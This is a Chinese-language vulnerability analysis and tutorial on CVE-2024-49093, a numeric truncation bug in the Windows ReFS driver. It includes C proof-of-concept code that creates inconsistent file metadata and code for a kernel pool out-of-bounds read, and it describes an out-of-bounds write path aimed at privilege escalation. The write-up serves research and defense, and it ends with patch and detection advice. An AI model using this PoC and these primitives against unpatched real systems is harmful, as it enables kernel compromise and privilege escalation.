CVE-2024-49093 ReFS漏洞深度分析与教学文档<\/strong><\/h2>
文档摘要<\/strong><\/h3>
本文档基于京东安全团队发布的漏洞分析文章，对Windows ReFS文件系统中的内核漏洞CVE-2024-49093进行全面的技术解析。漏洞根源在于数值类型转换错误，导致文件元数据处于不一致状态，进而可被利用实现内核池的越界读取与写入。本文将逐步讲解ReFS基础、漏洞成因、PoC构造及利用链细节。<\/p>

第一章：背景知识<\/strong><\/h3>
1.1 ReFS（Resilient File System）简介<\/strong><\/h4>

定位<\/strong>: Microsoft开发的新一代文件系统，旨在实现高数据可用性、高效处理海量数据，并通过校验和修复机制增强数据完整性。<\/li>
核心特性<\/strong>:

B+树结构（MinStore）<\/strong>: 大多数内部对象（如文件数据、元数据）以键值对形式存储在B+树中。<\/li>
写时复制（Copy-on-Write, COW）<\/strong>: 数据更新不就地修改，而是创建新节点并更新父节点指针，直至根节点。这增强了崩溃一致性。<\/li>
数据抽象<\/strong>: 文件的名称、数据、ACL等均被抽象为“属性”。<\/li> <\/ul> <\/li> <\/ul>
1.2 常驻（Resident）与非常驻（Non-Resident）属性<\/strong><\/h4>

常驻属性<\/strong>: 当属性数据量较小时，其内容直接内联存储在对应的B+树记录中。访问速度快。<\/li>
非常驻属性<\/strong>: 当数据量超过一定阈值（常驻阈值），属性内容将存储在磁盘的特定区域，而在B+树记录中只保存一个VCN -> LCN<\/code>的映射列表（称为runlist），用于定位数据块。<\/li> <\/ul> 1.3 漏洞相关内核函数<\/strong><\/h4> RefsAddAllocationForResidentWrite<\/code>: 该函数负责处理对常驻属性<\/strong>的数据写入请求。其核心逻辑是判断写入后数据是否会超过常驻阈值。如果未超过<\/strong>：则扩展当前常驻记录的分配大小。<\/li> 如果超过<\/strong>：则调用RefsConvertToNonResident<\/code>将属性从常驻转换为非常驻。<\/li> <\/ul> <\/li> <\/ul> 第二章：漏洞定位与成因分析<\/strong><\/h3> 2.1 补丁比对与定位<\/strong><\/h4> 补丁版本<\/strong>: Windows 11 24H2 (Build 26100.2605) 的KB5048667更新。<\/li> 定位方法<\/strong>: 使用Bindiff对比补丁前后的refs.sys<\/code>驱动文件，发现修复方式为新增一个特性开关函数 Feature_4213557561__private_IsEnabledDeviceUsageNoInline<\/code>，用于控制是否启用修复后的代码路径。该开关保护的函数正是RefsAddAllocationForResidentWrite<\/code>。<\/li> 官方分类<\/strong>: CWE-681: Incorrect Conversion between Numeric Types（数值类型转换不当）。<\/li> <\/ul> 2.2 漏洞根因<\/strong><\/h4> 漏洞存在于RefsAddAllocationForResidentWrite<\/code>函数中，当特性开关未开启<\/strong>（即存在漏洞的旧代码路径）时，发生了错误的数值转换。<\/p> 关键代码对比<\/strong>：<\/p> \/\/ 【修复后的正确路径】使用64位值 <\/span><\/span><\/span><\/span>QuadPart =<\/span> ranges-><\/span>end.QuadPart; \/\/ 64位写入结束位置 <\/span><\/span><\/span>\/\/ ... 使用 QuadPart 进行阈值判断和文件大小更新 ... <\/span><\/span><\/span><\/span>v23.AllocationSize.QuadPart =<\/span> QuadPart; <\/span><\/span> <\/span><\/span>\/\/ 【存在漏洞的旧路径】错误地使用了32位值 <\/span><\/span><\/span><\/span>LowPart =<\/span> ranges-><\/span>end.LowPart; \/\/ 只取了64位结束位置的低32位！ <\/span><\/span><\/span>\/\/ ... 使用 LowPart 进行阈值判断和文件大小更新 ... <\/span><\/span><\/span><\/span>v23.AllocationSize.QuadPart =<\/span> LowPart; \/\/ 危险！将高32位截断归零 <\/span><\/span><\/span><\/code><\/pre><\/li> 漏洞触发条件<\/strong>：<\/p> ReFS版本 ≥ 3.11 (0x30B)，此时常驻阈值为 0x800<\/code>（2 KiB）。<\/li> 写入操作的结束位置（offset + size<\/code>）必须满足：高32位不为0<\/strong>：即写入范围跨越4GB边界。<\/li> 低32位 < 0x800<\/strong>：使代码误判为写入未超过阈值，仍可保持常驻。<\/li> <\/ul> <\/li> <\/ol> <\/li> 造成的后果<\/strong>：文件控制块（SCB<\/code>）中的AllocationSize<\/code>（实际分配大小）被设置为一个被截断的、很小的值（如 0x200<\/code>），而FileSize<\/code>（文件逻辑大小）却被正确更新为真实的大值（如 0x100000200<\/code>）。这导致了 AllocationSize<\/code> << FileSize<\/code><\/strong> 的元数据不一致状态。<\/p> <\/li> <\/ul> 第三章：概念验证（PoC）与崩溃分析<\/strong><\/h3> 3.1 基础PoC代码<\/strong><\/h4> #include<\/span> <windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> \/\/ 使用 FILE_FLAG_NO_BUFFERING 避免文件缓存管理器的干扰 <\/span><\/span><\/span><\/span> HANDLE hFile =<\/span> CreateFileW( <\/span><\/span> L<\/span>"R:<\/span>\\<\/span>test_poc"<\/span>, <\/span><\/span> GENERIC_READ |<\/span> GENERIC_WRITE, <\/span><\/span> FILE_SHARE_READ |<\/span> FILE_SHARE_WRITE |<\/span> FILE_SHARE_DELETE, <\/span><\/span> NULL, <\/span><\/span> CREATE_ALWAYS, <\/span><\/span> FILE_ATTRIBUTE_NORMAL |<\/span> FILE_FLAG_NO_BUFFERING, \/\/ 关键标志 <\/span><\/span><\/span><\/span> NULL); <\/span><\/span> <\/span><\/span> if<\/span> (hFile ==<\/span> INVALID_HANDLE_VALUE) { <\/span><\/span> printf("CreateFile failed: %lu<\/span>\n<\/span>"<\/span>, GetLastError()); <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> DWORD written =<\/span> 0<\/span>; <\/span><\/span> BYTE buffer[0x200<\/span>]; \/\/ 写入512字节 <\/span><\/span><\/span><\/span> memset(buffer, 'A'<\/span>, sizeof<\/span>(buffer)); <\/span><\/span> <\/span><\/span> OVERLAPPED ov =<\/span> {0<\/span>}; <\/span><\/span> ov.Offset =<\/span> 0<\/span>; \/\/ 偏移低32位 <\/span><\/span><\/span><\/span> ov.OffsetHigh =<\/span> 1<\/span>; \/\/ 偏移高32位=1，确保写入结束于 1*4GB + 0x200 > 4GB <\/span><\/span><\/span><\/span> <\/span><\/span> BOOL success =<\/span> WriteFile(hFile, buffer, sizeof<\/span>(buffer), &<\/span>written, &<\/span>ov); <\/span><\/span> if<\/span> (success) { <\/span><\/span> printf("WriteFile succeeded. Written: %lu bytes<\/span>\n<\/span>"<\/span>, written); <\/span><\/span> } else<\/span> { <\/span><\/span> printf("WriteFile failed: %lu<\/span>\n<\/span>"<\/span>, GetLastError()); <\/span><\/span> } <\/span><\/span> <\/span><\/span> CloseHandle(hFile); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>注意<\/strong>: 非缓存I\/O要求写入长度和偏移必须是扇区大小（如512字节）的整数倍。<\/p> 3.2 验证漏洞效果<\/strong><\/h4> 执行PoC后，使用工具（如fsutil<\/code>）查看文件属性，会发现：<\/p> AllocationSize<\/code>（流分配大小）: 0x200<\/code> 字节<\/li> EndOfFile<\/code>（文件逻辑大小）: 0x100000200<\/code> 字节这证实了元数据的不一致状态已成功创建。<\/li> <\/ul> 第四章：漏洞利用链分析<\/strong><\/h3> 利用上述不一致状态，可以构造两种利用原语：越界读和越界写。<\/p> 4.1 越界读（OOB Read）<\/strong><\/h4> 原理<\/strong>：<\/p> 创建一个处于不一致状态的文件（AllocationSize = 0x200<\/code>, FileSize = 0x100000200<\/code>）。<\/li> 对该文件发起一个大于AllocationSize<\/code>的读取请求（如 0x1000<\/code>）。<\/li> 内核函数RefsNonCachedResidentRead<\/code>会执行：通过MsFindRow<\/code>在B+树中找到文件的常驻属性记录。<\/li> 调用CmsRowWithBuffer::CopyRow<\/code>将该记录的值部分复制到一个内核池内存块中。此池块大小根据常驻数据长度（0x200 + 头开销<\/code>）分配，约为0x250<\/code>。<\/li> 最后，该函数将从这个0x250<\/code>大小的池块中，拷贝用户请求的0x1000<\/code>字节到用户空间。<\/li> 由于源缓冲区只有0x250<\/code>字节，而拷贝长度是0x1000<\/code>，导致拷贝了0x1000 - 0x250 = 0xDB0<\/code>字节的池内存相邻数据，实现越界读。<\/li> <\/ul> <\/li> <\/ol> <\/li> 利用代码关键步骤<\/strong>：<\/p> \/\/ ... 续接基础PoC的写入之后 ... <\/span><\/span><\/span><\/span>DWORD bytesToRead =<\/span> 0x1000<\/span>; <\/span><\/span>BYTE*<\/span> readBuffer =<\/span> (BYTE*<\/span>)VirtualAlloc(NULL, bytesToRead, MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE); <\/span><\/span>memset(readBuffer, 0<\/span>, bytesToRead); <\/span><\/span> <\/span><\/span>OVERLAPPED readOv =<\/span> {0<\/span>}; <\/span><\/span>readOv.Offset =<\/span> 0<\/span>; <\/span><\/span>readOv.OffsetHigh =<\/span> 0<\/span>; \/\/ 从文件开头读 <\/span><\/span><\/span><\/span>DWORD bytesRead =<\/span> 0<\/span>; <\/span><\/span> <\/span><\/span>success =<\/span> ReadFile(hFile, readBuffer, bytesToRead, &<\/span>bytesRead, &<\/span>readOv); <\/span><\/span>if<\/span> (success) { <\/span><\/span> printf("ReadFile succeeded. Read: %lu bytes<\/span>\n<\/span>"<\/span>, bytesRead); <\/span><\/span> \/\/ 打印readBuffer，0x200字节后将是内核池中的相邻数据 <\/span><\/span><\/span><\/span> \/\/ hexdump(readBuffer, bytesRead); <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.2 越界写（OOB Write）<\/strong><\/h4> 直接通过WriteFile<\/code>进行越界写不可行，因为MsUpdateMetaRow<\/code>函数会检查写入范围是否超出常驻记录的边界。但可以通过间接方式实现。<\/p> 原理<\/strong>：利用 RefsConvertToNonResident<\/code> 函数。<\/p> 准备数据<\/strong>：先向文件写入一段数据（如 0x700<\/code> 字节），此时文件为常驻。<\/li> 触发漏洞将AllocationSize置零<\/strong>：精心构造一次写入，利用漏洞将AllocationSize<\/code>截断为一个极小的值，甚至0。例如，通过设置偏移使 ranges->end.LowPart = 0<\/code>。<\/li> 触发转换<\/strong>：随后，再发起一次写入（或直接触发转换条件），系统会调用RefsConvertToNonResident<\/code>，因为当前“常驻”状态的分配大小无法容纳新数据。<\/li> 转换过程中的OOB<\/strong>： RefsConvertToNonResident<\/code>会为新的非常驻数据分配存储空间。分配的大小基于卷的扇区大小对齐。如果AllocationSize<\/code>被篡改为0，它可能会计算并分配一个非常小的池块（如0x20<\/code>字节）。<\/li> 该函数随后会将旧常驻数据（我们之前写入的0x700<\/code>字节）拷贝到这个新分配的、极小的池块中。<\/li> 由于拷贝源数据长度（0x700<\/code>）远大于目标池块大小（0x20<\/code>），导致数据覆盖到池块之后的内存，实现越界写。<\/li> <\/ul> <\/li> <\/ol> <\/li> 利用价值<\/strong>：这种可控的越界写可以用于覆盖相邻内核对象的结构，如POOL_HEADER<\/code>、函数指针、权限标志等，是提权漏洞利用的关键一步。<\/p> <\/li> <\/ul> 第五章：总结与缓解<\/strong><\/h3> 5.1 漏洞总结<\/strong><\/h4> 根源<\/strong>: 64位到32位的数值截断错误。<\/li> 直接效果<\/strong>: 造成文件元数据（AllocationSize<\/code>与FileSize<\/code>）严重不一致。<\/li> 利用原语<\/strong>: 基于不一致状态，通过ReFS固有的数据读写和转换路径，实现内核池的越界读取和写入。<\/li> 复杂性<\/strong>: 利用链涉及对ReFS内部机制（如B+树操作、常驻\/非常驻转换）的深入理解。<\/li> <\/ul> 5.2 缓解措施<\/strong><\/h4> 官方方案<\/strong>: 及时安装Windows安全更新（KB5048667及以上），这是最根本的解决方法。<\/li> 临时缓解<\/strong>：在受影响系统中，若无必要，可不使用ReFS文件系统。<\/li> 检测建议<\/strong>: 安全产品可监控对ReFS卷的、偏移跨越4GB边界且长度较小的写入操作，作为潜在攻击行为指标。<\/li> <\/ul> 5.3 参考链接（源自原文）<\/strong><\/h4> MSRC公告: https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-49093<\/li> Winbindex（驱动版本查询）: https:\/\/winbindex.m417z.com\/?file=refs.sys<\/li> <\/ul> 免责声明<\/strong>：本文档仅用于安全研究与教学目的。读者应遵守《中华人民共和国网络安全法》等相关法律法规，任何利用此处所述技术从事非法攻击的行为，责任自负。<\/p>